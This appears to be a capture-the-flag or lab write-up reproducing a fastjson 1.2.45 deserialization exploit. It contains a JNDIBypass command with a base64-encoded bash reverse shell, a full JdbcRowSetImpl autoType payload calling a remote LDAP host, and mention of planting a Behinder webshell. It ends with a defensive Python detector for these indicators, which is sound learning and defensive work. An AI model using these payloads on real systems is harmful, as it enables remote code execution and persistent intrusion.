Exploit
Reference: https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md
The focus here is on reproducing the process in order to understand the exploit flow. There are many excellent write-ups by experts online, but they are not sufficient for foundational learning (especially on compiling Java files in IDEA, resolving dependency issues, and so on, -__-|). Therefore, I document my own reproduction process.
Capture the login request, as shown below:
Determine the version with the error-message method: send the following incomplete JSON and read the version from the error response.
{
"@type": "java.lang.AutoCloseable"
The fastjson version is 1.2.45.
According to the author's description, the target runs a recent JDK, so the JNDI restrictions of high JDK versions have to be bypassed; I therefore used the author's JNDIBypass.jar tool.
Start the LDAP service with JNDIBypass.jar:
java -jar .\JNDIBypass.jar -a 192.168.80.53 -p 1389 -c "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44MC41My8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"
Start an nc listener.
Send the request:
POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 262
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://192.168.80.53:1389/jpiuw",
        "autoCommit": true
    }
}
A shell is returned.
java -jar .\JNDIBypass.jar -h
Inject the IceScorpion (Behinder) backdoor.
Connect
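From the defender's side, the request body above has a recognisable shape: an "@type" key naming java.lang.Class with a "val" that pre-loads the gadget class, a second "@type" naming com.sun.rowset.JdbcRowSetImpl, and a dataSourceName pointing at a remote ldap:// reference. The following inspector is an added example written for this write-up, not code from the FastJsonParty project or the referenced tool; it parses a JSON body and reports each of those indicators, using constructed sample bodies (the attack sample mirrors the payload above with a documentation IP).

```python
from __future__ import annotations

import json
from typing import Any, Iterator

# Constructed sample bodies: the first mirrors the login payload above,
# the second is an ordinary login request.
SAMPLE_ATTACK = ('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                 '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                 '"dataSourceName":"ldap://192.0.2.10:1389/x","autoCommit":true}}')
SAMPLE_BENIGN = '{"username":"alice","password":"secret"}'

# Gadget class reached through fastjson autoType in this write-up.
DANGEROUS_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}
# Schemes that turn JdbcRowSetImpl.dataSourceName into a remote JNDI lookup.
REMOTE_SCHEMES = ("ldap://", "ldaps://", "rmi://")


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, str, Any]]:
    """Yield (json_path, key, value) for every object member, recursively."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield f"{path}.{key}", key, value
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from walk(item, f"{path}[{i}]")


def inspect_body(body: str) -> list[str]:
    """Return findings for one JSON request body; an empty list means clean."""
    try:
        doc = json.loads(body)  # decodes "\u0040type" back to "@type" before matching
    except ValueError:
        return ["unparseable JSON body"]  # log it rather than silently passing
    findings: list[str] = []
    for path, key, value in walk(doc):
        if key == "@type" and isinstance(value, str):
            if value in DANGEROUS_TYPES:
                findings.append(f"{path}: blocked autoType class {value}")
            elif value == "java.lang.Class":
                findings.append(f"{path}: java.lang.Class used to pre-load a class")
            else:
                findings.append(f"{path}: autoType key present ({value})")
        elif key == "val" and isinstance(value, str) and value in DANGEROUS_TYPES:
            findings.append(f"{path}: gadget class named in Class.val ({value})")
        if isinstance(value, str) and value.lower().startswith(REMOTE_SCHEMES):
            findings.append(f"{path}: remote JNDI reference {value}")
    return findings
```

Matching on the parsed document rather than on the raw text is what catches escaped keys such as "\u0040type"; an unparseable body is reported instead of ignored, since fastjson is more lenient than json.loads.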